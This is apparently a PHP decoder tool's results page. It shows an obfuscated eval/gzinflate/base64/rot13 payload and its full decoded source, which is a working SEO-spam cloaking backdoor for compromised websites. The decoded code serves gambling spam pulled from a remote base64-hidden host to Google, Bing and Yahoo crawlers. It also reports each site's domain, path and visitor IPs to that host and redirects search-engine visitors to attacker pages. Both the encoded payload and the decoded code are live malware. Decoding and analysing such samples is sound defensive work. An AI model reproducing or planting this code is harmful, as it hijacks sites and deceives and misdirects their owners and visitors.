Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(gzinflate(base64_decode(str_rot13('gIu7H+YVSi9oC0KTbxlbNpsUhAqUpnpDNwVotD2tI+qB..
Decoded Output download
set_time_limit(0);
error_reporting(0);
define('VERSION', 'PSUFW');
define('APIVERSION', 'YNcgZGvg');
define('API', base64_decode('aHR0cHM6Ly9naWFvdGllcDM2NS5jb20v'));
define('API_HTTP', base64_decode('aHR0cDovL2dpYW90aWVwMzY1LmNvbS8='));
define('API2', '');
define('FALLBACK_REDIRECT_HTML', base64_decode('PGh0bWw+CiAgICA8aGVhZD4KICAgICAgICA8dGl0bGU+VGhlIHJlc291cmNlIGNhbm5vdCBiZSBmb3VuZC48L3RpdGxlPgogICAgICAgIDxzY3JpcHQ+d2luZG93LmxvY2F0aW9uPSJodHRwczovL2dpYW90aWVwMzY1LmNvbS9yLzEuaHRtbCI7PC9zY3JpcHQ+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8aDE+Tm90IEZvdW5kPC9oMT4KICAgIDwvYm9keT4KPC9odG1sPgo='));
$req_ref = $_SERVER["HTTP_REFERER"];
$req_ua = $_SERVER["HTTP_USER_AGENT"];
$host = $_SERVER['HTTP_HOST'];
$req_uri = $_SERVER['REQUEST_URI'];
function fetch_prefix() {
}
function insert_html() {
ob_start();
register_shutdown_function('insert_html_end');
}
function insert_html_end() {
$output = ob_get_contents();
ob_end_clean();
}
function is_prefix($uri, $prefix_regex='/[?\/](app|ios|android|download|blank|bet|casino|games|play|video|poker|root|news|patt|tee|sto|bea|slo|bac|pac|tig|bmw|fru|bull|card|gods|fish|mahj|zop|xsn|xiazai|vna|soft|rna|qsj|muv|iphone|gov|edu|apk|wp-news|uri|bak|start|gaming|sport|football|bull)./') {
return preg_match($prefix_regex, $uri) === 1;
}
function is_crawler($ua) {
$crawlers = array('Googlebot', 'Bingbot', 'MSNBOT', 'Yahoo!');
foreach ($crawlers as $c) {
if (stripos($ua, $c) !== false) {
return true;
}
}
return false;
}
function is_visitor($ref) {
if (substr($ref, 0, 4) === 'http') {
$refs = array('google.', 'bing.', 'yahoo.');
foreach ($refs as $r) {
if (stripos($ref, $r) !== false) {
return true;
}
}
}
return false;
}
function get_content($url, $headers=array(), $conn_timeout=0, $trans_timeout=0) {
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $conn_timeout);
curl_setopt($ch, CURLOPT_TIMEOUT, $trans_timeout);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$result = curl_exec($ch);
if(curl_errno($ch)){
$result = NULL;
}
curl_close($ch);
return $result;
}
else {
return file_get_contents($url);
}
}
function get_client_ip(){
foreach (array('HTTP_CLIENT_IP', 'HTTP_X_REAL_IP', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key){
if (array_key_exists($key, $_SERVER) === true){
foreach (explode(',', $_SERVER[$key]) as $ip){
$ip = trim($ip);
if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false){
return $ip;
}
}
}
}
}
function main() {
global $req_ref, $req_ua, $host, $req_uri;
header('Cache-Control: no-store, no-cache, must-revalidate');
header('Cache-Control: post-check=0, pre-check=0', FALSE);
header('Pragma: no-cache');
$uri_encoded = urlencode($req_uri);
$headers = array();
if (isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) {
$lang = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
array_push($headers, "Accept-Language: $lang");
array_push($headers, "Vary: Accept-Language");
}
if (is_crawler($req_ua)) {
$crawler_ip = get_client_ip();
if (is_prefix($req_uri)) {
header('Content-Type:text/html; charset=utf-8');
echo get_content(API_HTTP. "connector.html?domain={$host}&uri={$uri_encoded}&ip={$crawler_ip}&ver=" . VERSION . "&v=" . APIVERSION, $headers);
exit;
}
else {
echo get_content(API_HTTP. "friends.html?domain={$host}&uri={$uri_encoded}&ip={$crawler_ip}&ver=" . VERSION . "&v=" . APIVERSION);
}
}
elseif (is_prefix($req_uri) && is_visitor($req_ref)) {
header('Content-Type:text/html; charset=utf-8');
$client_ip = get_client_ip();
$allheaders = array();
if (!function_exists('getallheaders')) {
function getallheaders() {
$tmp_headers = array();
foreach ($_SERVER as $name => $value) {
if (substr($name, 0, 5) == 'HTTP_') {
$tmp_headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value;
}
}
return $tmp_headers;
}
$allheaders = getallheaders();
}
else {
$allheaders = getallheaders();
}
foreach ($allheaders as $key => $value) {
if (stripos($key, 'Sec-') === 0) {
array_push($headers, "$key: $value");
}
}
$html = get_content(API_HTTP. "redirectv1.html?domain={$host}&uri={$uri_encoded}&ip={$client_ip}&ver=" . VERSION . "&v=" . APIVERSION, $headers, 3, 3);
echo ($html? $html: FALLBACK_REDIRECT_HTML);
exit;
}
}
main();Did this file decode correctly?
Original Code
<?php eval(gzinflate(base64_decode(str_rot13('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'))));?>
Function Calls
| gzinflate | 1 |
| str_rot13 | 1 |
| base64_decode | 1 |
Stats
| MD5 | 7fa2d22019aa8b02c00e7ad2bf2da4d9 |
| Eval Count | 1 |
| Decode Time | 72 ms |